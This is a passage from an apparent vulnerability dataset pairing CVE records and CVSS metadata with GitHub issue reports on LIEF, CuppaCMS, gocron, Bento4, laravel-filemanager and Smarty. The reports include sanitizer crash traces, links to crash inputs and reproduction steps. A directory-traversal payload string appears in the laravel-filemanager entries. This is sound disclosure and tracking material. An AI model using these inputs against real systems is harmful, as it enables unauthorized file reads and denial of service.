std::allocator<unsigned char> >, LIEF::ELF::Binary*>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, LIEF::ELF::NOTE_TYPES_CORE&&, std::vector<unsigned char, std::allocator<unsigned char> >&&, LIEF::ELF::Binary*&&) /usr/include/c++/9/bits/unique_ptr.h:857 #9 0x559aebf183ac in LIEF::ELF::Parser::parse_notes(unsigned long, unsigned long) /home/wcc/LIEF/src/ELF/Parser.cpp:568 #10 0x559aebf8c11c in boost::leaf::result<LIEF::ok_t> LIEF::ELF::Parser::parse_binary<LIEF::ELF::details::ELF32>() /home/wcc/LIEF/src/ELF/Parser.tcc:296 #11 0x559aebf1bad5 in LIEF::ELF::Parser::init(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&) /home/wcc/LIEF/src/ELF/Parser.cpp:323 #12 0x559aebf1bf8d in LIEF::ELF::Parser::parse(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, LIEF::ELF::DYNSYM_COUNT_METHODS) /home/wcc/LIEF/src/ELF/Parser.cpp:342 #13 0x559aebc1f3ae in elf_parse /home/wcc/LIEF/api/c/ELF/Binary.cpp:67 #14 0x559aebc1ce4f in main /home/wcc/LIEF/examples/c/elf_reader.c:16 #15 0x7f49b9b990b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #16 0x559aebc1cc3d in _start (/home/wcc/LIEF/build/examples/c/elf_reader+0x281c3d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /usr/include/c++/9/bits/basic_string.h:187 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::_M_length(unsigned long) ==3230843==ABORTING ```
SEGV in CoreFile.tcc:69
https://api.github.com/repos/lief-project/LIEF/issues/766/comments
0
2022-08-10T10:09:19Z
2022-08-13T05:00:37Z
https://github.com/lief-project/LIEF/issues/766
1,334,389,058
766
4,137
CVE-2022-37191
2022-09-13T23:15:08.667
The component "cuppa/api/index.php" of CuppaCMS v1.0 is Vulnerable to LFI. An authenticated user can read system files via crafted POST request using [function] parameter value as LFI payload.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/20" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/badru8612/CuppaCMS-Authenticated-LFI-Vulnerability" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/CuppaCMS/CuppaCMS/issues/20" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/badru8612/CuppaCMS-Authenticated-LFI-Vulnerability" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "983E1279-93C7-47D9-9AC8-EFB6D57B92E7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "829" ]
829
https://github.com/CuppaCMS/CuppaCMS/issues/20
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "CuppaCMS", "CuppaCMS" ]
There is a serious Local File Inclusion vulnerability exists in **"cuppa/api/index.php"** via **POST** requests "**function**" parameter. **PoC:** ![lfimap_cuppa-4](https://user-images.githubusercontent.com/10436828/150742843-ff0f05ee-1b82-451b-b44c-ec683aa904c0.png) Reference: https://github.com/badru8612/CuppaCMS-Authenticated-LFI-Vulnerability
Authenticated Local File Inclusion vulnerability in cuppa api.
https://api.github.com/repos/CuppaCMS/CuppaCMS/issues/20/comments
0
2022-01-24T07:59:02Z
2022-01-25T23:08:06Z
https://github.com/CuppaCMS/CuppaCMS/issues/20
1,112,291,001
20
4,138
CVE-2022-40365
2022-09-14T21:15:10.583
Cross site scripting (XSS) vulnerability in ouqiang gocron through 1.5.3, allows attackers to execute arbitrary code via scope.row.hostname in web/vue/src/pages/taskLog/list.vue.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ouqiang/gocron" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ouqiang/gocron/issues/362" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/ouqiang/gocron" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ouqiang/gocron/issues/362" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gocron_project:gocron:*:*:*:*:*:*:*:*", "matchCriteriaId": "556143D0-A8C7-4901-80C8-1F0FDA88554C", "versionEndExcluding": null, "versionEndIncluding": "1.5.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/ouqiang/gocron/issues/362
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ouqiang", "gocron" ]
### Introduction > `gocron/web/vue/src/pages/taskLog/list.vue` line 91 host will be parsed by the browser as html, which leads to xss vulnerability ### Proof ![image](https://user-images.githubusercontent.com/51900604/183246981-4410b284-3ea8-49be-9f90-59615cf97175.png) <img width="1776" alt="image" src="https://user-images.githubusercontent.com/51900604/183247054-868c1c22-7319-4a26-8149-406995816db4.png">
There is an xss vulnerability in the front end
https://api.github.com/repos/ouqiang/gocron/issues/362/comments
0
2022-08-06T11:30:51Z
2022-08-06T11:30:51Z
https://github.com/ouqiang/gocron/issues/362
1,330,728,479
362
4,139
CVE-2022-40438
2022-09-14T21:15:10.627
Buffer overflow vulnerability in function AP4_MemoryByteStream::WritePartial in mp42aac in Bento4 v1.6.0-639, allows attackers to cause a denial of service via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/751" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/751" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/axiomatic-systems/Bento4/issues/751
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, developers of Bento4: In the test of the binary mp42aac instrumented with ASAN. There are some inputs causing heap-buffer-overflow. Here is the ASAN mode output: ================================================================= ==4695==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6190000027a0 at pc 0x7ffff6ef6964 bp 0x7fffffffdea0 sp 0x7fffffffd648 WRITE of size 4294967288 at 0x6190000027a0 thread T0 #0 0x7ffff6ef6963 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c963) #1 0x409ed4 in AP4_MemoryByteStream::WritePartial(void const*, unsigned int, unsigned int&) /home/ferry/dp/Bento4/Source/C++/Core/Ap4ByteStream.cpp:785 #2 0x40d9e3 in AP4_ByteStream::Write(void const*, unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4ByteStream.cpp:77 #3 0x4eb601 in AP4_Atom::Write(AP4_ByteStream&) /home/ferry/dp/Bento4/Source/C++/Core/Ap4Atom.cpp:229 #4 0x4eb601 in AP4_Atom::Clone() /home/ferry/dp/Bento4/Source/C++/Core/Ap4Atom.cpp:316 #5 0x446d7a in AP4_SampleDescription::AP4_SampleDescription(AP4_SampleDescription::Type, unsigned int, AP4_AtomParent*) /home/ferry/dp/Bento4/Source/C++/Core/Ap4SampleDescription.cpp:138 #6 0x461a8f in AP4_GenericAudioSampleDescription::AP4_GenericAudioSampleDescription(unsigned int, unsigned int, unsigned short, unsigned short, AP4_AtomParent*) /home/ferry/dp/Bento4/Source/C++/Core/Ap4SampleDescription.h:259 #7 0x461a8f in AP4_AudioSampleEntry::ToSampleDescription() /home/ferry/dp/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:630 #8 0x48ca03 in AP4_StsdAtom::GetSampleDescription(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:181 #9 0x4040b6 in main /home/ferry/dp/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:268 #10 0x7ffff61bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #11 0x408338 in _start (/home/ferry/dp/Bento4/mp42aac+0x408338) 0x6190000027a0 is located 0 bytes to the right of 1056-byte region [0x619000002380,0x6190000027a0) allocated by thread T0 here: #0 0x7ffff6f03712 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99712) #1 0x414c8e in AP4_DataBuffer::ReallocateBuffer(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x414c8e in AP4_DataBuffer::SetBufferSize(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:136 #3 0x414c8e in AP4_DataBuffer::Reserve(unsigned int) /home/ferry/dp/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:107 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy Shadow bytes around the buggy address: 0x0c327fff84a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fff84e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fff84f0: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fff8540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==4695==ABORTING ### Crash input https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/input2 ### Validation steps ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42aac input2 /dev/null ``` ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Heap-buffer-overflow with ASAN in mp42aac
https://api.github.com/repos/axiomatic-systems/Bento4/issues/751/comments
0
2022-09-07T02:21:29Z
2022-09-18T23:10:27Z
https://github.com/axiomatic-systems/Bento4/issues/751
1,364,000,633
751
4,140
CVE-2022-40439
2022-09-14T21:15:10.670
An memory leak issue was discovered in AP4_StdcFileByteStream::Create in mp42ts in Bento4 v1.6.0-639, allows attackers to cause a denial of service via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/750" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/750" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/axiomatic-systems/Bento4/issues/750
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, developers of Bento4: In the test of the binary mp42ts instrumented with ASAN. There are some inputs causing memory leaks. Here is the ASAN mode output: ================================================================= ==18321==ERROR: LeakSanitizer: detected memory leaks Direct leak of 48 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x4c871d in AP4_StdcFileByteStream::Create(AP4_FileByteStream*, char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:279 #2 0x4c871d in AP4_FileByteStream::Create(char const*, AP4_FileByteStream::Mode, AP4_ByteStream*&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/System/StdC/Ap4StdCFileByteStream.cpp:439 Indirect leak of 72 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x404286 in main /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:511 #2 0x7ffff61bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) Indirect leak of 64 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x4f57d1 in AP4_RtpAtom::Create(unsigned int, AP4_ByteStream&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4RtpAtom.h:53 #2 0x4f57d1 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:689 Indirect leak of 24 byte(s) in 1 object(s) allocated from: #0 0x7ffff6f03592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x4d2591 in AP4_List<AP4_Atom>::Add(AP4_Atom*) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4List.h:160 #2 0x4d2591 in AP4_AtomParent::AddChild(AP4_Atom*, int) /home/ferry/dp/chunkfuzzer-evaluation/unibench-latest/Bento4/Source/C++/Core/Ap4Atom.cpp:532 SUMMARY: AddressSanitizer: 208 byte(s) leaked in 4 allocation(s). ### **Crash Input** https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/input1 ### Verification steps: ``` git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42ts input1 /dev/null ``` ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Memory leaks with ASAN in mp42ts
https://api.github.com/repos/axiomatic-systems/Bento4/issues/750/comments
0
2022-09-06T14:00:13Z
2023-05-29T02:53:17Z
https://github.com/axiomatic-systems/Bento4/issues/750
1,363,336,565
750
4,141
CVE-2022-40734
2022-09-14T23:15:09.583
UniSharp laravel-filemanager (aka Laravel Filemanager) before 2.6.4 allows download?working_dir=%2F.. directory traversal to read arbitrary files, as exploited in the wild in June 2022. This is related to league/flysystem before 2.0.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:*", "matchCriteriaId": "F55D5755-7EE5-4205-A976-12D1DBAB33B0", "versionEndExcluding": null, "versionEndIncluding": "2.5.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/UniSharp/laravel-filemanager/issues/1150
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "UniSharp", "laravel-filemanager" ]
I do not use this package, but I seen this in our firewall blocked list. My guess is that there is some sort of vulnerability. ![image](https://user-images.githubusercontent.com/7761519/174942318-e389fa0a-dc43-4732-8b93-976ae2e87363.png)
Directory traversal vulnerability (CVE-2022-40734)
https://api.github.com/repos/UniSharp/laravel-filemanager/issues/1150/comments
19
2022-06-22T04:18:30Z
2024-03-28T15:31:00Z
https://github.com/UniSharp/laravel-filemanager/issues/1150
1,279,489,454
1,150
4,142
CVE-2022-40734
2022-09-14T23:15:09.583
UniSharp laravel-filemanager (aka Laravel Filemanager) before 2.6.4 allows download?working_dir=%2F.. directory traversal to read arbitrary files, as exploited in the wild in June 2022. This is related to league/flysystem before 2.0.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:*", "matchCriteriaId": "F55D5755-7EE5-4205-A976-12D1DBAB33B0", "versionEndExcluding": null, "versionEndIncluding": "2.5.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966
null
github.com
[ "UniSharp", "laravel-filemanager" ]
I do not use this package, but I seen this in our firewall blocked list. My guess is that there is some sort of vulnerability. ![image](https://user-images.githubusercontent.com/7761519/174942318-e389fa0a-dc43-4732-8b93-976ae2e87363.png)
Directory traversal vulnerability (CVE-2022-40734)
https://api.github.com/repos/UniSharp/laravel-filemanager/issues/1150/comments
19
2022-06-22T04:18:30Z
2024-03-28T15:31:00Z
https://github.com/UniSharp/laravel-filemanager/issues/1150
1,279,489,454
1,150
4,143
CVE-2022-40734
2022-09-14T23:15:09.583
UniSharp laravel-filemanager (aka Laravel Filemanager) before 2.6.4 allows download?working_dir=%2F.. directory traversal to read arbitrary files, as exploited in the wild in June 2022. This is related to league/flysystem before 2.0.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1320186966" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:unisharp:laravel_filemanager:*:*:*:*:*:*:*:*", "matchCriteriaId": "F55D5755-7EE5-4205-A976-12D1DBAB33B0", "versionEndExcluding": null, "versionEndIncluding": "2.5.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/UniSharp/laravel-filemanager/issues/1150#issuecomment-1825310417
null
github.com
[ "UniSharp", "laravel-filemanager" ]
I do not use this package, but I seen this in our firewall blocked list. My guess is that there is some sort of vulnerability. ![image](https://user-images.githubusercontent.com/7761519/174942318-e389fa0a-dc43-4732-8b93-976ae2e87363.png)
Directory traversal vulnerability (CVE-2022-40734)
https://api.github.com/repos/UniSharp/laravel-filemanager/issues/1150/comments
19
2022-06-22T04:18:30Z
2024-03-28T15:31:00Z
https://github.com/UniSharp/laravel-filemanager/issues/1150
1,279,489,454
1,150
4,144
CVE-2018-25047
2022-09-15T00:15:09.580
In Smarty before 3.1.47 and 4.x before 4.2.1, libs/plugins/function.mailto.php allows XSS. A web page that uses smarty_function_mailto, and that could be parameterized using GET or POST input parameters, could allow injection of JavaScript code by a user.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/870100" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/smarty-php/smarty/issues/454" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/smarty-php/smarty/releases/tag/v3.1.47" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/smarty-php/smarty/releases/tag/v4.2.1" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00002.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202209-09" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugs.gentoo.org/870100" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/smarty-php/smarty/issues/454" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/smarty-php/smarty/releases/tag/v3.1.47" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/smarty-php/smarty/releases/tag/v4.2.1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2023/01/msg00002.html" }, { "source": 